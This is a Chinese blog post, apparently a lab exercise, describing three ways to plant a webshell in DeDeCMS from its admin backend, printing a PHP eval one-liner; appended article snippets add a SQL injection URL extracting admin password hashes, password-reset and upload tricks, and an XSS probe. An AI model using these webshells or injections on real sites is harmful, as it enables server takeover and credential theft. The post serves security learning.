常见CMS漏洞（二）：DeDeCMS

最新推荐文章于 2025-11-10 20:57:24 发布

原创最新推荐文章于 2025-11-10 20:57:24 发布 · 796 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#DeDeCMS #CMS漏洞 #靶场

简介

DedeCMS是织梦团队开发PHP 网站管理系统，它以简单、易用、高效为特色，组建出各种各样各具特色的网站，如地方户、行业门户、政府及企事业站点等。

利用方法：

姿势一：通过文件管理器上传WebShell

打开网站，依次点击核心--文件式管理器--文件上传

上传木马文件5.php后点击访问文件

<?php @eval($_GET[cmd]);?>

在后面使用参数即可

姿势二：修改模板文件拿WebShell

依次点击，模板--默认模板管理--index.htm--修改

写入代码或一句话木马

依次点击生成--更新主页--位置由index.htm改为index,php--生成静态--更新主页

打开网站即可

姿势三：后台任意命令执行拿WebShell

依次点击模块--广告管理--增加一个新广告

填写广告标识--广告内容填写一句话木马--确定

把此处拼接在网址后面

蚁剑连接即可

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与神明画鸭

关注关注

6
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)

李同學的安全圈

05-31

4493

uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一，在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。

“DedeCMS存在的安全漏洞及编程解决方案“

HackSquad的博客

10-03

809

本文介绍了DedeCMS中常见的安全漏洞，包括SQL注入漏洞、文件上传漏洞和跨站脚本漏洞，并提供了相应的编程解决方案。在开发和使用DedeCMS时时，务必注意安全性，并采取适当的措施来防止这些漏洞的利用。在本文中，我们将详细介绍DedeCMS常见的安全漏洞，并提供相应的编程解决方案。为了防止文件上传漏洞，应该对上传的文件进行严格的验证和过滤。可以检查文件的扩展名、文件类型、文件大小等，并将上传的文件存储在一个独立的目录中，避免直接执行上传文件。为了防止跨站脚本漏洞，应该对用户输入的内容进行适当的转义。

参与评论您还未登录，请先登录后发表或查看评论

Dedecms二次注入漏洞（环境搭建到漏洞复现全过程）

最新发布

2301_80677497的博客

11-10

793

本文总结了DedeCMS漏洞复现过程：首先搭建PhpStudy环境并配置DedeCMS，版本需匹配(php5.3+mysql5.0)。通过网站栏目管理添加文档并发布评论，利用HackBar构造恶意请求，结合Navicat执行SQL注入语句插入特殊评论。最终成功获取管理员密码哈希值，通过cmd5网站解密完成漏洞复现。

DeDeCMS 漏洞修改汇总

qq_34862577的博客

02-28

3777

1、标题: dedecms模版SQL注入漏洞披露时间: 1970-01-01 08:00:00简介:dedecms的/member/soft_add.php中，对输入模板参数$servermsg1未进行严格过滤，导致攻击者可构造模版闭合标签，实现模版注入进行GETSHELL。解决方案:方案一：使用云盾自研补丁进行一键修复；方案二：更新该软件到官方最新版本或寻求该软件提供商的帮助。【注意：该补丁为云...

DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞

网站安全专家

08-10

4014

织梦dedecms，在整个互联网中许多企业网站，个人网站，优化网站都在使用dede作为整个网站的开发架构，dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问，首页以及栏目页生成html静态化，大大的加快的网站访问速度，以及搜索引擎的友好度，利于百度蜘蛛的抓取，深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞，存在高危的parse_str函数sql注入漏...

DeDeCMS漏洞

weixin_53198216的博客

08-03

397

4.在生成下选择更新主页HTML，将主页位置后缀改为php，首页模式选择生成静态，再点击更新主页HTML。2.选择模板下的默认模板管理，找到index.htm。7.打开蚁剑，输入网址和密码点击测试连接，显示成功。6.复制到地址栏访问，没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。

DeDe-cms 漏洞

weixin_69065643的博客

08-03

434

找到index.html修改。我们写一个一句话木马，点击访问后使用工具连接。

常见CMS漏洞（wordpress,DedeCms,ASPCMS,PHPMyAdmin）

qq_54694921的博客

12-28

800

常见CMS漏洞（wordpress,DedeCms,ASPCMS,PHPMyAdmin保姆级漏洞探测

2401_84296945的博客

05-14

694

我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用，当secure_file_priv = 为空，则可以写入sql语句到数据库，当secure_file_priv = NULL，则不可以往数据库里写sql语句，当secure_file_priv = /xxx，一个指定目录的时候，就只能往这个指定的目录里面写东西。网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

【文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞

m0_64378913的博客

07-12

2556

编辑器就是网站后台编辑网页的在线编辑器，会自动集成文件上传功能，这些编辑器的某些版本也存在文件上传漏洞，从而进行getshell（1）ewebeditor（比较古老的编辑器）（2）fckeditor利用小马拉大马也是一个惯用伎俩！CMS 又叫网站内容管理系统（网站的模版，帮助我们快速建站，我们会在这个网站模板上做二次开发），市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞，但是产生文件上传漏洞的原因不尽相同，情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多，比如常见的dedeCMS（

渗透实战：dedeCMS任意用户密码重置到内网getshell

zz12345600354的博客

05-29

1144

DedeCMS是一款国产的开源CMS系统，具有使用简单、功能强大、可扩展性好等特点。然而，像其他CMS系统一样，DedeCMS也存在一些安全问题，其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露，攻击者可以获取到网站的用户的用户名和一些敏感信息，然后通过利用任意密码重置漏洞，在不知道原密码的情况下，重置管理员账号的密码，从而获取管理员权限。接着，攻击者可以通过后台getshell，获取网站的控制权，进而进行各种恶意操作，如上传恶意文件、篡改网站内容、窃取用户信息等。

CMS程序织梦内容管理系统(DedeCms) v2.1.2-dedecms212.zip

03-21

10. **文档整理**：压缩包中的“资料整理”可能包含了关于DedeCms的使用教程、常见问题解答、安装配置指南等，帮助用户快速上手和解决问题。综上所述，织梦内容管理系统（DedeCms）是一个功能全面、易用性强的CMS...

护卫神的博客

12-06

830

护卫神·防入侵系统』的“篡改防护”模块内置有DEDECMS的防篡改策略，只需要在“篡改防护-添加CMS防护”，选择“DEDECMS（织梦）安全模板”，就可以自动配置好防篡改规则，非常强大、方便。如下图一，使用『护卫神·防入侵系统』对后台（/admin/）进行保护，后期访问时需要先验证授权密码（如图二），只有输入了正确的密码才能访问。DedeCms系统（织梦系统）是一套PHP开发的网站管理系统，因其功能强大，操作使用简单，具有非常高的知名度，拥有大量用户。（图二：访问后台需要输入授权密码）

DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)

末初 · mochu7

05-18

3150

文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖，进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖，RunMagicQuotes()每个参数的值进行了特殊字符转义处理继续分析 uploads/install/i

dedecms 漏洞汇总

热门推荐

积木网络

02-29

1万+

Dedecms 5.6 rss注入漏洞 http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入

DeDeCMS漏洞复现（基于PHP搭建）

2301_79638144的博客

11-07

1900

dedecms平台搭建及漏洞复现

常见CMS漏洞（WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin）

2301_76631050的博客

08-04

2721

利⽤mysql⽇志⽂件写shell，这个⽇志可以在mysql⾥改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)

DedeCms 织梦系统漏洞上传webshell复现四种方法超详细

qq_48368964的博客

08-03

1074

DedeCMS是织梦团队开发PHP 网站管理系统，它以简单、易用、高效为特色，组建出各种各样各具特色的网站，如地方门户、行业门户、政府及企事业站点等。

dedecms 漏洞_DedeCMS任意用户密码重置漏洞

weixin_39636540的博客

11-29

998

漏洞环境Fofa搜dedecms漏洞危害重置系统的所有账号的密码影响范围DeDecms V5.7 SP2最新版本漏洞复现首先注册账号0000001/0000002登录成功通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器，再次访问登录页面构造请求包生成poc/member/resetpassword.php?dopost=safequestion&safequ...

织梦cms 漏洞复现

12-11

织梦CMS（DedeCMS）是一款广泛使用的开源内容管理系统（CMS），由于其功能强大和使用便捷，受到了很多网站开发者的青睐。然而，织梦CMS也存在一些安全漏洞，攻击者可以利用这些漏洞对网站进行攻击。以下是织梦CMS常见漏洞的复现过程： ### 1. SQL注入漏洞 #### 漏洞描述 SQL注入是一种常见的攻击方式，攻击者通过在输入框中输入恶意的SQL语句，从而获取数据库中的敏感信息。 #### 复现步骤 1. **找到注入点**：在织梦CMS中，常见的注入点包括搜索功能、文章ID等。 2. **构造注入语句**：例如，假设文章ID为`1`，可以尝试在URL中加入注入语句： ``` http://www.example.com/plus/view.php?aid=1 and 1=1 ``` 如果页面正常显示，说明存在SQL注入漏洞。 3. **获取数据库信息**：通过构造不同的SQL语句，可以逐步获取数据库的表名、字段名等信息。 ### 2. 文件上传漏洞 #### 漏洞描述文件上传漏洞是指攻击者通过上传恶意文件（如脚本文件）来获取服务器的控制权。 #### 复现步骤 1. **找到上传点**：在织梦CMS中，常见的上传点包括头像上传、附件上传等。 2. **构造恶意文件**：例如，构造一个包含PHP代码的图片文件： ```php <?php phpinfo(); ?> ``` 3. **上传文件**：将恶意文件上传到服务器。 4. **访问上传文件**：通过浏览器访问上传的文件URL，如果服务器执行了PHP代码，说明存在文件上传漏洞。 ### 3. XSS漏洞 #### 漏洞描述跨站脚本攻击（XSS）是指攻击者在网页中插入恶意脚本，从而窃取用户信息或进行其他恶意操作。 #### 复现步骤 1. **找到XSS点**：在织梦CMS中，常见的XSS点包括搜索框、留言板等。 2. **构造XSS语句**：例如，在搜索框中输入以下代码： ``` <script>alert('XSS')</script> ``` 3. **提交查询**：如果页面弹出提示框，说明存在XSS漏洞。 ### 防护措施 1. **及时更新**：及时更新织梦CMS到最新版本，修复已知漏洞。 2. **输入验证**：对用户输入进行严格验证，防止SQL注入和XSS攻击。 3. **文件验证**：对上传的文件进行严格验证，防止文件上传漏洞。 4. **安全配置**：配置Web服务器的安全选项，如禁用不必要的服务和功能。